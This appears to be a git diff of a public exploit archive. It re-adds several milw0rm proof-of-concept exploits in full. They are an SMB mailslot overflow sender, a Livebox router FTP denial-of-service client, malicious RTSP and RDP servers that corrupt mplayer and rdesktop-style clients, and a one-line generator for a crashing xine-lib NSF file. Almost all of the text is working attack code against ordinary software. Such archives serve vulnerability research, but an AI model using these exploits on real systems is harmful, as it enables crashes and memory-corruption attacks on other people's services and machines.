safe_strcpy(char *a, char *b, uint32_t size) +{ + strcpy(b, a); +} + +void put_name(char *dest, const char *name, int pad, unsigned int name_type) +{ + size_t len = strlen(name); + + memcpy(dest, name, (len < MAX_NETBIOSNAME_LEN) ? len : MAX_NETBIOSNAME_LEN - 1); + if (len < MAX_NETBIOSNAME_LEN - 1) + { + memset(dest + len, pad, MAX_NETBIOSNAME_LEN - 1 - len); + } + + dest[MAX_NETBIOSNAME_LEN - 1] = name_type; +} + +int put_nmb_name(char *buf,int offset,struct nmb_name *name) +{ + int ret,m; + nstring buf1; + char *p; + + if (strcmp(name->name,"*") == 0) + { + /* special case for wildcard name */ + put_name(buf1, "*", '\0', name->name_type); + } + else + { + put_name(buf1, name->name, ' ', name->name_type); + } + + buf[offset] = 0x20; + + ret = 34; + + for (m=0;m>4)&0xF); + buf[offset+2+2*m] = 'A' + (buf1[m]&0xF); + } + offset += 33; + + buf[offset] = 0; + + if (name->scope[0]) + { + /* XXXX this scope handling needs testing */ + ret += strlen(name->scope) + 1; + safe_strcpy(&buf[offset+1],name->scope,sizeof(name->scope)); + + p = &buf[offset+1]; + while ((p = strchr(p,'.'))) + { + buf[offset] = PTR_DIFF(p,&buf[offset+1]); + offset += (buf[offset] + 1); + p = &buf[offset+1]; + } + buf[offset] = strlen(&buf[offset+1]); + } + + return(ret); +} + +typedef struct exudp_s +{ + unsigned char msg_type; + unsigned char flags; + uint16_t dgm_id; + uint32_t source_ip; + uint16_t source_port; + uint16_t dgm_len; + uint16_t pOffset; + struct nmb_name source_name; + struct nmb_name dest_name; +} exudp; + +/* code */ + +int send_udp(int ip, char *packet, unsigned int packetSize) +{ + int fd; + struct sockaddr_in to; + int len; + + if( (fd = socket(AF_INET, SOCK_DGRAM, 0)) < 0) + return 0; + + to.sin_family = AF_INET; + to.sin_addr.s_addr = ip; + to.sin_port = htons(138); + + if( (len = sendto(fd, packet, packetSize, 0, (struct sockaddr *)&to, sizeof(struct sockaddr_in))) < 0) + { + perror("sendto"); + return 0; + } + + return len; +} + +int main(int argc, char *argv[]) +{ + unsigned char samlogon[10240]; + unsigned int nlOffset; + exudp dgPacket; + + printf("smb_mailslot() POC by asmx86@gmail.com\n\n"); + + if(argc < 3) + { + printf("Usage: %s \n\n", argv[0]); + exit(1); + } + + if(strlen(argv[1]) > 15) + { + printf("[!] netbios victim's name too long\n"); + exit(1); + } + + memset(samlogon, 0, sizeof(samlogon)); + + dgPacket.msg_type = 0x11; + dgPacket.flags = 1; + dgPacket.dgm_id = 0xdead; + dgPacket.source_ip = 0xdeadbeef; + dgPacket.source_port = 0xc0fe; + dgPacket.dgm_len = 0; + dgPacket.pOffset = 0; + + strcpy(dgPacket.source_name.name, "ASMX86@GMAILCOM"); + strcpy(dgPacket.dest_name.name, argv[1]); + + nlOffset = 14; + + nlOffset += put_nmb_name((char *)&samlogon, nlOffset, &dgPacket.source_name); + nlOffset += put_nmb_name((char *)&samlogon, nlOffset, &dgPacket.dest_name); + +#define OFFSET 97 + + nlOffset -= 4; + SCVAL(samlogon, nlOffset+4, 0); + SSVAL(samlogon, nlOffset+4+OFFSET, 18); + SCVAL(samlogon, nlOffset+7, 0); + SCVAL(samlogon, nlOffset+8, 0x25); + SSVAL(samlogon, nlOffset+59, 397); + + SSVAL(samlogon, nlOffset+61, OFFSET); + + SSVAL(samlogon, nlOffset+63, 0); + + SSVAL(samlogon, nlOffset+36, 12); + memcpy(&samlogon[nlOffset+39+(12*2)], "\\MAILSLOT\\NET\\NTLOGON", 21); + + memcpy(&samlogon[nlOffset+4+OFFSET+4], "\x41\x00\x41\x00\x00\x00", 6); + memcpy(&samlogon[nlOffset+4+OFFSET+4+6-1], "\x42\x00\x42\x00\x00\x00", 6); + memset(&samlogon[nlOffset+4+OFFSET+4+6+6], '\x43', 260); //play with this value ;) + + nlOffset = 576; + + dgPacket.dgm_len = nlOffset - 14; + dgPacket.dgm_len = htons(dgPacket.dgm_len); + + memcpy(&samlogon, &dgPacket, 14); + + if(!send_udp(inet_addr(argv[2]), samlogon, nlOffset)) + fprintf(stderr, "[!] Error sending UDP packet\n"); + else + fprintf(stderr, "[*] packet sent\n"); + + return 0; +} +//eof + +// milw0rm.com [2007-12-14] diff --git a/platforms/linux/dos/5210.c b/platforms/linux/dos/5210.c index 59fa22c51..ba6f99e9b 100755 --- a/platforms/linux/dos/5210.c +++ b/platforms/linux/dos/5210.c @@ -1,114 +1,114 @@ -/* -Discovered bY 0in From DaRk-CodeRs Programming & Security Group! -Contact: 0in(dot)email[at]gmail(dot)com -HOMEPAGE: http://dark-coders.4rh.eu - -DESCRIPTION: - -Livebox router is vulnerability to remote (but from local network, because firewall working..) buffer overflow DoS attack to FTP service. - - -POC: -*/ - -#include -#include -#include -#include -#include -#include -#include -#include - -int port=21; -struct hostent *he; -struct sockaddr_in their_addr; - - - -int konekt(char *addr) -{ -int sock; - -he=gethostbyname(addr); -if(he==NULL) -{ -printf("Unknow host!\nexiting..."); -return -1; -} -if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) -{ -perror("socket"); -return -2; -} - -their_addr.sin_family = AF_INET; -their_addr.sin_port = htons(port); -their_addr.sin_addr = *((struct in_addr *)he->h_addr); -memset(&(their_addr.sin_zero), '\0', 8); -if (connect(sock, (struct sockaddr *)&their_addr, -sizeof(struct sockaddr)) == -1) -{ -perror("connect"); -return -1; -} - -return sock; -} - -int main(int argc,char *argv[]) -{ -printf("\n+===============================Yeah======================================+"); -printf("\n+= ADI Convergence Galaxy FTP Server v1.0 (Neostrada Livebox DSL Router) =+"); -printf("\n+= Remote Buffer Overflow DoS Exploit =+"); -printf("\n+= bY =+"); -printf("\n+= Maks M. [0in] From Dark-CodeRs Security & Programming Group! =+"); -printf("\n+= 0in(dot)email[at]gmail(dot)com =+"); -printf("\n+= Please visit: http://dark-coders.4rh.eu =+"); -printf("\n+= Greetings to: Die_Angel, Sun8hclf, M4r1usz, Aristo89, Djlinux =+"); -printf("\n+= And other friends: MaLy, Slim, elwin013, Rade0n3900, Wojto111, =+"); -printf("\n+= Chomzee, AfroPL, Joker186 =+"); -printf("\n+===============================Yeah======================================+"); - -if(argc<2) -{ -printf("\nUse %s [IP]!\n",argv[0]); -exit(0); -} -printf("\nConnecting to:%s...",argv[1]); -int sock=konekt(argv[1]); -if(sock<0) -{ -printf("\neh..."); -exit(0); -} -printf("\nConnected!!\n"); -char rcv[256]; -recv(sock,rcv,255,0); -printf("\n%s\n",rcv); -printf("\nSending evil buffer.."); -char evil[100*100]="%n\x01\x02\x03\x04"; -int i; -for(i=0;i<(100*100)-100;i++) -{ -strcat(evil,"A"); -} - -strcat(evil,"\r\n"); -send(sock,evil,strlen(evil),0); -strcpy(rcv,""); -recv(sock,rcv,255,0); -printf("\n%s\n",rcv); -char pass[100*1000]="PASS "; -strcat(pass,evil); -strcat(pass,"\n\r"); -send(sock,pass,strlen(pass),0); -strcpy(rcv,""); -recv(sock,rcv,255,0); -printf("\n%s\n",rcv); -printf("\nOK!\nYou're Livebox FTP server should fucked out..."); - -exit(0); -} - -// milw0rm.com [2008-03-01] +/* +Discovered bY 0in From DaRk-CodeRs Programming & Security Group! +Contact: 0in(dot)email[at]gmail(dot)com +HOMEPAGE: http://dark-coders.4rh.eu + +DESCRIPTION: + +Livebox router is vulnerability to remote (but from local network, because firewall working..) buffer overflow DoS attack to FTP service. + + +POC: +*/ + +#include +#include +#include +#include +#include +#include +#include +#include + +int port=21; +struct hostent *he; +struct sockaddr_in their_addr; + + + +int konekt(char *addr) +{ +int sock; + +he=gethostbyname(addr); +if(he==NULL) +{ +printf("Unknow host!\nexiting..."); +return -1; +} +if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) +{ +perror("socket"); +return -2; +} + +their_addr.sin_family = AF_INET; +their_addr.sin_port = htons(port); +their_addr.sin_addr = *((struct in_addr *)he->h_addr); +memset(&(their_addr.sin_zero), '\0', 8); +if (connect(sock, (struct sockaddr *)&their_addr, +sizeof(struct sockaddr)) == -1) +{ +perror("connect"); +return -1; +} + +return sock; +} + +int main(int argc,char *argv[]) +{ +printf("\n+===============================Yeah======================================+"); +printf("\n+= ADI Convergence Galaxy FTP Server v1.0 (Neostrada Livebox DSL Router) =+"); +printf("\n+= Remote Buffer Overflow DoS Exploit =+"); +printf("\n+= bY =+"); +printf("\n+= Maks M. [0in] From Dark-CodeRs Security & Programming Group! =+"); +printf("\n+= 0in(dot)email[at]gmail(dot)com =+"); +printf("\n+= Please visit: http://dark-coders.4rh.eu =+"); +printf("\n+= Greetings to: Die_Angel, Sun8hclf, M4r1usz, Aristo89, Djlinux =+"); +printf("\n+= And other friends: MaLy, Slim, elwin013, Rade0n3900, Wojto111, =+"); +printf("\n+= Chomzee, AfroPL, Joker186 =+"); +printf("\n+===============================Yeah======================================+"); + +if(argc<2) +{ +printf("\nUse %s [IP]!\n",argv[0]); +exit(0); +} +printf("\nConnecting to:%s...",argv[1]); +int sock=konekt(argv[1]); +if(sock<0) +{ +printf("\neh..."); +exit(0); +} +printf("\nConnected!!\n"); +char rcv[256]; +recv(sock,rcv,255,0); +printf("\n%s\n",rcv); +printf("\nSending evil buffer.."); +char evil[100*100]="%n\x01\x02\x03\x04"; +int i; +for(i=0;i<(100*100)-100;i++) +{ +strcat(evil,"A"); +} + +strcat(evil,"\r\n"); +send(sock,evil,strlen(evil),0); +strcpy(rcv,""); +recv(sock,rcv,255,0); +printf("\n%s\n",rcv); +char pass[100*1000]="PASS "; +strcat(pass,evil); +strcat(pass,"\n\r"); +send(sock,pass,strlen(pass),0); +strcpy(rcv,""); +recv(sock,rcv,255,0); +printf("\n%s\n",rcv); +printf("\nOK!\nYou're Livebox FTP server should fucked out..."); + +exit(0); +} + +// milw0rm.com [2008-03-01] diff --git a/platforms/linux/dos/5307.pl b/platforms/linux/dos/5307.pl index bdf7632b4..72d0a352a 100755 --- a/platforms/linux/dos/5307.pl +++ b/platforms/linux/dos/5307.pl @@ -1,131 +1,131 @@ -#!/usr/bin/perl - -# Huston, mplayer got some vulns! :( -# CVE-2008-0073 also apply to mplayer and vlc with some distinctions. -# -# Assuming kernel.va_randomize=0 this overwrite EIP with a "stream" structure on my box. -# -# The first element of the "stream" structure is a user-supplied buffer so it is not really useful to overwrite -# EIP, let's find the right target: we can overwrite every memory location beyond the desc->stream pointer and -# some before it. -# -# Vulnerable code: -# sdpplin_parse_stream() -# desc->stream_id=atoi(buf); -# spplin_parse() -# desc->stream[stream->stream_id]=stream; -# -# Test: -# - mplayer rtsp://evilhost/evil.rm -# eax 0xa0737008 // pointer to desc->stream -# edx 0x0495badd // "streamid" value -# edi 0x089b59e8 // pointer to stream -# -# : mov DWORD PTR [eax+edx*4],edi - -use warnings; -use strict; -use IO::Socket; - -my $evil_num = "127467297"; # this is a 4byte offset from desc->stream - - -my $rtp_hello = "RTSP/1.0 200 OK\r\n". - "CSeq: 1\r\n". - "Date: Thu, 20 Mar 2008 20:07:39 GMT\r\n". - "Server: RealServer Version 9.0.2.794 (sunos-5.8-sparc-server)\r\n". - "Public: OPTIONS, DESCRIBE, ANNOUNCE, PLAY, SETUP, GET_PARAMETER, SET_PARAMETER, TEARDOWN\r\n". - "RealChallenge1: de6654ba4935b8b9d8af3ba8d6f8e71c\r\n". - "StatsMask: 3\r\n\r\n"; - -my $rtp_evil = "RTSP/1.0 200 OK\r\n". - "CSeq: 2\r\n". - "Date: Thu, 20 Mar 2008 20:08:34 GMT\r\n". - "vsrc: http://0.00.00.00:31337\r\n". - "Content-base: rtsp://0.00.00.00:554/bu.rm\r\n". - "ETag: 55370-2\r\n". - "Session: 93033-2\r\n". - "Content-type: application/sdp\r\n". - "Content-length: 677\r\n\r\n". - - "v=0\r\n". - "o=-1028652722 1028652722 IN IP4 0.00.00.00\r\n". - "s=realmp3\r\n". - "i= \r\n". - "c=IN IP4 0.0.0.0\r\n". - "t=0 0\r\n". - "a=SdpplinVersion:1610645242\r\n". - "a=StreamCount:integer;\"1166000000\"\r\n". - "a=Title:buffer;\"dtFabH2rNoP=\"\r\n". - "a=range:npt=0-39.471000\r\n". - "m=audio 0 RTP/AVP 101\r\n". # this is referenced by "stream" - "b=AS:128\r\n". - "a=control:streamid=$evil_num\r\n". - "a=range:npt=0-39.471000\r\n". - "a=length:npt=39.471000\r\n". - "a=rtpmap:101 X-MP3-draft-00/1000\r\n". - "a=mimetype:string;\"audio/X-MP3-draft-00\"\r\n". - "a=StartTime:integer;0\r\n". - "a=AvgBitRate:integer;128000\r\n". - "a=SampleRate:integer;44100\r\n". - "a=AvgPacketSize:integer;417\r\n". - "a=Preroll:integer;1000\r\n". - "a=NumChannels:integer;2\r\n". - "a=MaxPacketSize:integer;1024\r\n". - "a=ASMRuleBook:string;\"AverageBandwidth=128000, AverageBandwidthStd=0, Priority=9;\"\r\n"; - - - -my @resps = ( $rtp_hello, - $rtp_evil, - - "RTSP/1.0 200 OK\r\n". - "CSeq: 3\r\n". - "Date: Sat, 22 Mar 2008 20:45:47 GMT\r\n". - "Session: 93033-2\n\r". - "Reconnect: true\n\r". - "RealChallenge3: 2520b5cd0e5e5622ec25f563312aba3e4f213d09,sdr=2b05ef3b\n\r". - "RDTFeatureLevel: 2\r\n". - "Transport: x-pn-tng/tcp;interleaved=0\r\n\r\n", - - "RTSP/1.0 200 OK\r\n". - "CSeq: 4\r\n". - "Date: Sat, 22 Mar 2008 15:11:06 GMT\r\n". - "Session: 93033-2\r\n\r\n", - - "RTSP/1.0 200 OK\r\n". - "CSeq: 5\r\n". - "Date: Sat, 22 Mar 2008 15:11:06 GMT". - "RTP-Info: url=rtsp://0.00.00.00/bu.rm\r\n\r\n", - ); - - -my $sock = IO::Socket::INET->new(LocalAddr => '0.0.0.0', LocalPort => '554', Listen => 1, Reuse => 1); - -while(my $csock = $sock->accept) -{ - foreach my $resp(@resps) - { - my $buf = read_from_sock($csock); - print $csock $resp; - } -} - - -sub read_from_sock() -{ - my ($sock) = @_; - - my $buffer = ""; - - while(<$sock>) - { - return $buffer if /^\r\n$/; - $buffer .= $_; - } - - return $buffer; - -} - -# milw0rm.com [2008-03-25] +#!/usr/bin/perl + +# Huston, mplayer got some vulns! :( +# CVE-2008-0073 also apply to mplayer and vlc with some distinctions. +# +# Assuming kernel.va_randomize=0 this overwrite EIP with a "stream" structure on my box. +# +# The first element of the "stream" structure is a user-supplied buffer so it is not really useful to overwrite +# EIP, let's find the right target: we can overwrite every memory location beyond the desc->stream pointer and +# some before it. +# +# Vulnerable code: +# sdpplin_parse_stream() +# desc->stream_id=atoi(buf); +# spplin_parse() +# desc->stream[stream->stream_id]=stream; +# +# Test: +# - mplayer rtsp://evilhost/evil.rm +# eax 0xa0737008 // pointer to desc->stream +# edx 0x0495badd // "streamid" value +# edi 0x089b59e8 // pointer to stream +# +# : mov DWORD PTR [eax+edx*4],edi + +use warnings; +use strict; +use IO::Socket; + +my $evil_num = "127467297"; # this is a 4byte offset from desc->stream + + +my $rtp_hello = "RTSP/1.0 200 OK\r\n". + "CSeq: 1\r\n". + "Date: Thu, 20 Mar 2008 20:07:39 GMT\r\n". + "Server: RealServer Version 9.0.2.794 (sunos-5.8-sparc-server)\r\n". + "Public: OPTIONS, DESCRIBE, ANNOUNCE, PLAY, SETUP, GET_PARAMETER, SET_PARAMETER, TEARDOWN\r\n". + "RealChallenge1: de6654ba4935b8b9d8af3ba8d6f8e71c\r\n". + "StatsMask: 3\r\n\r\n"; + +my $rtp_evil = "RTSP/1.0 200 OK\r\n". + "CSeq: 2\r\n". + "Date: Thu, 20 Mar 2008 20:08:34 GMT\r\n". + "vsrc: http://0.00.00.00:31337\r\n". + "Content-base: rtsp://0.00.00.00:554/bu.rm\r\n". + "ETag: 55370-2\r\n". + "Session: 93033-2\r\n". + "Content-type: application/sdp\r\n". + "Content-length: 677\r\n\r\n". + + "v=0\r\n". + "o=-1028652722 1028652722 IN IP4 0.00.00.00\r\n". + "s=realmp3\r\n". + "i= \r\n". + "c=IN IP4 0.0.0.0\r\n". + "t=0 0\r\n". + "a=SdpplinVersion:1610645242\r\n". + "a=StreamCount:integer;\"1166000000\"\r\n". + "a=Title:buffer;\"dtFabH2rNoP=\"\r\n". + "a=range:npt=0-39.471000\r\n". + "m=audio 0 RTP/AVP 101\r\n". # this is referenced by "stream" + "b=AS:128\r\n". + "a=control:streamid=$evil_num\r\n". + "a=range:npt=0-39.471000\r\n". + "a=length:npt=39.471000\r\n". + "a=rtpmap:101 X-MP3-draft-00/1000\r\n". + "a=mimetype:string;\"audio/X-MP3-draft-00\"\r\n". + "a=StartTime:integer;0\r\n". + "a=AvgBitRate:integer;128000\r\n". + "a=SampleRate:integer;44100\r\n". + "a=AvgPacketSize:integer;417\r\n". + "a=Preroll:integer;1000\r\n". + "a=NumChannels:integer;2\r\n". + "a=MaxPacketSize:integer;1024\r\n". + "a=ASMRuleBook:string;\"AverageBandwidth=128000, AverageBandwidthStd=0, Priority=9;\"\r\n"; + + + +my @resps = ( $rtp_hello, + $rtp_evil, + + "RTSP/1.0 200 OK\r\n". + "CSeq: 3\r\n". + "Date: Sat, 22 Mar 2008 20:45:47 GMT\r\n". + "Session: 93033-2\n\r". + "Reconnect: true\n\r". + "RealChallenge3: 2520b5cd0e5e5622ec25f563312aba3e4f213d09,sdr=2b05ef3b\n\r". + "RDTFeatureLevel: 2\r\n". + "Transport: x-pn-tng/tcp;interleaved=0\r\n\r\n", + + "RTSP/1.0 200 OK\r\n". + "CSeq: 4\r\n". + "Date: Sat, 22 Mar 2008 15:11:06 GMT\r\n". + "Session: 93033-2\r\n\r\n", + + "RTSP/1.0 200 OK\r\n". + "CSeq: 5\r\n". + "Date: Sat, 22 Mar 2008 15:11:06 GMT". + "RTP-Info: url=rtsp://0.00.00.00/bu.rm\r\n\r\n", + ); + + +my $sock = IO::Socket::INET->new(LocalAddr => '0.0.0.0', LocalPort => '554', Listen => 1, Reuse => 1); + +while(my $csock = $sock->accept) +{ + foreach my $resp(@resps) + { + my $buf = read_from_sock($csock); + print $csock $resp; + } +} + + +sub read_from_sock() +{ + my ($sock) = @_; + + my $buffer = ""; + + while(<$sock>) + { + return $buffer if /^\r\n$/; + $buffer .= $_; + } + + return $buffer; + +} + +# milw0rm.com [2008-03-25] diff --git a/platforms/linux/dos/5458.txt b/platforms/linux/dos/5458.txt index be3a7004a..3c52a46c5 100755 --- a/platforms/linux/dos/5458.txt +++ b/platforms/linux/dos/5458.txt @@ -1,29 +1,29 @@ -xine-lib <= 1.1.12 is prone to a stack-based buffer overflow in the NES -Sound Format demuxer(demux_nsf.c). - - -- Code - -open_nsf_file(): - -109: this->title = strdup(&header[0x0E]); - -demux_nsf_send_chunk(): - -122: char title[100]; -162: sprintf(title, "%s, song %d/%d", - this->title, this->current_song, this->total_songs); - - -- Affected applications - -http://xinehq.de/index.php/releases - - -- PoC - -perl -e 'print -"\x4E\x45\x53\x4D\x1A\x01\x01\x01\x80\x80\x18\x8A\x03\x8A" . "\x41" x -114' > evil.mp3 - -# milw0rm.com [2008-04-16] +xine-lib <= 1.1.12 is prone to a stack-based buffer overflow in the NES +Sound Format demuxer(demux_nsf.c). + + +- Code + +open_nsf_file(): + +109: this->title = strdup(&header[0x0E]); + +demux_nsf_send_chunk(): + +122: char title[100]; +162: sprintf(title, "%s, song %d/%d", + this->title, this->current_song, this->total_songs); + + +- Affected applications + +http://xinehq.de/index.php/releases + + +- PoC + +perl -e 'print +"\x4E\x45\x53\x4D\x1A\x01\x01\x01\x80\x80\x18\x8A\x03\x8A" . "\x41" x +114' > evil.mp3 + +# milw0rm.com [2008-04-16] diff --git a/platforms/linux/dos/551.c b/platforms/linux/dos/551.c index f7e505421..7303f9c62 100755 --- a/platforms/linux/dos/551.c +++ b/platforms/linux/dos/551.c @@ -96,6 +96,6 @@ printf("Payload has been sent! Check if the webserver is dead! "); closesocket(mysocket); WSACleanup(); return 0; -} - -// milw0rm.com [2004-09-27] +} + +// milw0rm.com [2004-09-27] diff --git a/platforms/linux/dos/5561.pl b/platforms/linux/dos/5561.pl index 1b8d4a74a..624047953 100755 --- a/platforms/linux/dos/5561.pl +++ b/platforms/linux/dos/5561.pl @@ -1,23 +1,23 @@ -#!/usr/bin/perl -# -# http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=696 - -use warnings; -use strict; -use IO::Socket; - -my $sock = IO::Socket::INET->new(LocalAddr => '0.0.0.0', LocalPort => '3389', Listen => 1, Reuse => 1) || die($!); - -while(my $c = $sock->accept()) -{ - print $c "\x03" .# TPKT version - "\x00" .# reserved - "\x00\x01" .# evil length here - "\x06\xd0\x00\x00\x12\x34\x00" . - "\x41" x 204942; - - sleep 1; - close $sock; -} - -# milw0rm.com [2008-05-08] +#!/usr/bin/perl +# +# http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=696 + +use warnings; +use strict; +use IO::Socket; + +my $sock = IO::Socket::INET->new(LocalAddr => '0.0.0.0', LocalPort => '3389', Listen => 1, Reuse => 1) || die($!); + +while(my $c = $sock->accept()) +{ + print $c "\x03" .# TPKT version + "\x00" .# reserved + "\x00\x01" .# evil length here + "\x06\xd0\x00\x00\x12\x34\x00" . + "\x41" x 204942; + + sleep 1; + close $sock; +} + +# milw0rm.com [2008-05-08] diff --git a/platforms/linux/dos/5585.pl b/platforms/linux/dos/5585.pl index 53743337a..8cb4a4797 100755 --- a/platforms/linux/dos/5585.pl +++ b/platforms/linux/dos/5585.pl @@ -1,95 +1,95 @@ -#!/usr/bin/perl -# -# http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=697 - -use strict; -use IO::Socket; - -my $sock = IO::Socket::INET->new(LocalAddr => '0.0.0.0', LocalPort => '3389', Listen => 1, Reuse => 1) || die($!); - -my $evil = "\x03\x00\x01\x47\x02\xf0\x80\x68\x00\x01\x03\xeb\x70\x81\x38" . - "\x01\x00\x10\x00" . - "\xc5\x32" . - "\x04\x75" . # PDU TYPE == 0x4 == PDU_REDIRECT - "\xb7\xda\xf8\x43" . - "\x01\x00\x00\x00" . - "\x01\x00\x00\x00" . - "\xff\xff\xff\xff" . # len of g_redirect_cookie - "\x41" x 64 ; # g_redirect_cookie - -while(my $c = $sock->accept()) -{ - while(<$c>) - { - print $c ONE(), TWO(), THREE(), FOUR(), FIVE(), SIX(), SEVEN(), $evil; - } -} - - - - -sub ONE() -{ - "\x03\x00\x00\x0b\x06\xd0\x00\x00\x12\x34\x00" -} - -sub TWO() -{ - "\x03\x00\x01\x49\x02\xf0\x80\x7f\x66\x82\x01". - "\x3d\x0a\x01\x00\x02\x01\x00\x30\x1a\x02\x01". - "\x22\x02\x01\x03\x02\x01\x00\x02\x01\x01\x02". - "\x01\x00\x02\x01\x01\x02\x03\x00\xff\xf8\x02". - "\x01\x02\x04\x82\x01\x17\x00\x05\x00\x14\x7c". - "\x00\x01\x2a\x14\x76\x0a\x01\x01\x00\x01\xc0". - "\x00\x4d\x63\x44\x6e\x81\x00\x01\x0c\x08\x00". - "\x04\x00\x08\x00\x03\x0c\x0c\x00\xeb\x03\x01". - "\x00\xec\x03\x00\x00\x02\x0c\xec\x00\x02\x00". - "\x00\x00\x02\x00\x00\x00\x20\x00\x00\x00\xb8". - "\x00\x00\x00\x29\x60\xbb\x2f\xc4\x4d\x00\x9e". - "\x58\x8a\xb4\x85\x35\x6a\x71\xea\xad\xf9\x3d". - "\x0e\x5e\x8e\x87\x64\x2d\x52\x42\xed\xb2\x91". - "\x3f\xf9\x01\x00\x00\x00\x01\x00\x00\x00\x01". - "\x00\x00\x00\x06\x00\x5c\x00\x52\x53\x41\x31". - "\x48\x00\x00\x00\x00\x02\x00\x00\x3f\x00\x00". - "\x00\x01\x00\x01\x00\xf9\xa3\x35\xb2\x78\x63". - "\x8d\x94\x65\x47\x22\x54\x49\x55\xae\x6f\x74". - "\x69\x73\x6e\xee\x2b\xa5\xd0\x47\xf6\xc0\x89". - "\x2e\xa0\x54\xf5\x12\x87\x75\xb5\x89\xf7\x83". - "\x48\xd9\x54\xeb\xde\x20\x73\xd6\xd8\xf3\xee". - "\x0f\xf7\xc2\xaa\xa4\x79\x0a\x5a\x64\x92\x53". - "\xc4\x75\xd4\x00\x00\x00\x00\x00\x00\x00\x00". - "\x08\x00\x48\x00\xf6\x20\x04\x62\x5b\x2f\x04". - "\xae\x02\x04\x4a\x7e\xcf\x59\x02\x11\xf7\x7f". - "\xab\x74\x95\xce\x01\x4e\xf6\x14\x50\x0b\xd7". - "\x54\x8f\xf0\x92\xd5\x0c\x6f\x42\xd8\x21\x98". - "\x9f\x87\x50\x9a\x33\x6c\xef\x65\x05\x5c\x4a". - "\x93\x51\xc1\x69\x59\x7c\x3d\xf4\x63\xdc\x53". - "\x66\x3b\x00\x00\x00\x00\x00\x00\x00\x00" -} - -sub THREE() -{ - "\x03\x00\x00\x0b\x02\xf0\x80\x2e\x00\x00\x04" -} - -sub FOUR() -{ - "\x03\x00\x00\x0f\x02\xf0\x80\x3e\x00\x00\x04\x03\xed\x03\xed" -} - -sub FIVE() -{ - "\x03\x00\x00\x0f\x02\xf0\x80\x3e\x00\x00\x04\x03\xeb\x03\xeb" -} - -sub SIX() -{ - "\x03\x00\x00\x0f\x02\xf0\x80\x3e\x00\x00\x04\x03\xec\x03\xec" -} - -sub SEVEN() -{ - "\x03\x00\x00\x22\x02\xf0\x80\x68\x00\x01\x03\xeb\x70\x14\x80\x02\x10\x00\xff\x03\x10\x00\x07\x00\x00\x00\x02\x00\x00\x00\x30\x9a\x00\x00" -} - -# milw0rm.com [2008-05-11] +#!/usr/bin/perl +# +# http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=697 + +use strict; +use IO::Socket; + +my $sock = IO::Socket::INET->new(LocalAddr => '0.0.0.0', LocalPort => '3389', Listen => 1, Reuse => 1) || die($!); + +my $evil = "\x03\x00\x01\x47\x02\xf0\x80\x68\x00\x01\x03\xeb\x70\x81\x38" . + "\x01\x00\x10\x00" . + "\xc5\x32" . + "\x04\x75" . # PDU TYPE == 0x4 == PDU_REDIRECT + "\xb7\xda\xf8\x43" . + "\x01\x00\x00\x00" . + "\x01\x00\x00\x00" . + "\xff\xff\xff\xff" . # len of g_redirect_cookie + "\x41" x 64 ; # g_redirect_cookie + +while(my $c = $sock->accept()) +{ + while(<$c>) + { + print $c ONE(), TWO(), THREE(), FOUR(), FIVE(), SIX(), SEVEN(), $evil; + } +} + + + + +sub ONE() +{ + "\x03\x00\x00\x0b\x06\xd0\x00\x00\x12\x34\x00" +} + +sub TWO() +{ + "\x03\x00\x01\x49\x02\xf0\x80\x7f\x66\x82\x01". + "\x3d\x0a\x01\x00\x02\x01\x00\x30\x1a\x02\x01". + "\x22\x02\x01\x03\x02\x01\x00\x02\x01\x01\x02". + "\x01\x00\x02\x01\x01\x02\x03\x00\xff\xf8\x02". + "\x01\x02\x04\x82\x01\x17\x00\x05\x00\x14\x7c". + "\x00\x01\x2a\x14\x76\x0a\x01\x01\x00\x01\xc0". + "\x00\x4d\x63\x44\x6e\x81\x00\x01\x0c\x08\x00". + "\x04\x00\x08\x00\x03\x0c\x0c\x00\xeb\x03\x01". + "\x00\xec\x03\x00\x00\x02\x0c\xec\x00\x02\x00". + "\x00\x00\x02\x00\x00\x00\x20\x00\x00\x00\xb8". + "\x00\x00\x00\x29\x60\xbb\x2f\xc4\x4d\x00\x9e". + "\x58\x8a\xb4\x85\x35\x6a\x71\xea\xad\xf9\x3d". + "\x0e\x5e\x8e\x87\x64\x2d\x52\x42\xed\xb2\x91". + "\x3f\xf9\x01\x00\x00\x00\x01\x00\x00\x00\x01". + "\x00\x00\x00\x06\x00\x5c\x00\x52\x53\x41\x31". + "\x48\x00\x00\x00\x00\x02\x00\x00\x3f\x00\x00". + "\x00\x01\x00\x01\x00\xf9\xa3\x35\xb2\x78\x63". + "\x8d\x94\x65\x47\x22\x54\x49\x55\xae\x6f\x74". + "\x69\x73\x6e\xee\x2b\xa5\xd0\x47\xf6\xc0\x89". + "\x2e\xa0\x54\xf5\x12\x87\x75\xb5\x89\xf7\x83". + "\x48\xd9\x54\xeb\xde\x20\x73\xd6\xd8\xf3\xee". + "\x0f\xf7\xc2\xaa\xa4\x79\x0a\x5a\x64\x92\x53". + "\xc4\x75\xd4\x00\x00\x00\x00\x00\x00\x00\x00". + "\x08\x00\x48\x00\xf6\x20\x04\x62\x5b\x2f\x04". + "\xae\x02\x04\x4a\x7e\xcf\x59\x02\x11\xf7\x7f". + "\xab\x74\x95\xce\x01\x4e\xf6\x14\x50\x0b\xd7". + "\x54\x8f\xf0\x92\xd5\x0c\x6f\x42\xd8\x21\x98". + "\x9f\x87\x50\x9a\x33\x6c\xef\x65\x05\x5c\x4a". + "\x93\x51\xc1\x69\x59\x7c\x3d\xf4\x63\xdc\x53". + "\x66\x3b\x00\x00\x00\x00\x00\x00\x00\x00" +} + +sub THREE() +{ + "\x03\x00\x00\x0b\x02\xf0\x80\x2e\x00\x00\x04" +} + +sub FOUR() +{ + "\x03\x00\x00\x0f\x02\xf0\x80\x3e\x00\x00\x04\x03\xed\x03\xed" +} + +sub FIVE() +{ + "\x03\x00\x00\x0f\x02\xf0\x80\x3e\x00\x00\x04\x03\xeb\x03\xeb" +} + +sub SIX() +{ + "\x03\x00\x00\x0f\x02\xf0\x80\x3e\x00\x00\x04\x03\xec\x03\xec" +} + +sub SEVEN() +{ + "\x03\x00\x00\x22\x02\xf0\x80\x68\x00\x01\x03\xeb\x70\x14\x80\x02\x10\x00\xff\x03\x10\x00\x07\x00\x00\x00\x02\x00\x00\x00\x30\x9a\x00\x00" +} + +# milw0rm.com [2008-05-11] diff --git a/platforms/linux/dos/5814.pl 